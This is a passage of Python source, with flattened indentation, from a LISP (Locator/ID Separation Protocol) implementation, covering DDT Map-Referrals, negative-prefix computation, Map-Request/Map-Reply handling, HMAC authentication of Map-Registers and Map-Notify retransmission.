# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Set RLOC to the cached RLOC and set port to gleaned port so we
# can find the RLOC key in lisp_rloc_probe_list.
#
if (mc and mc.gleaned):
rloc = mc.rloc_set[0]
port = rloc.translated_port
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None or mc.gleaned == False):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
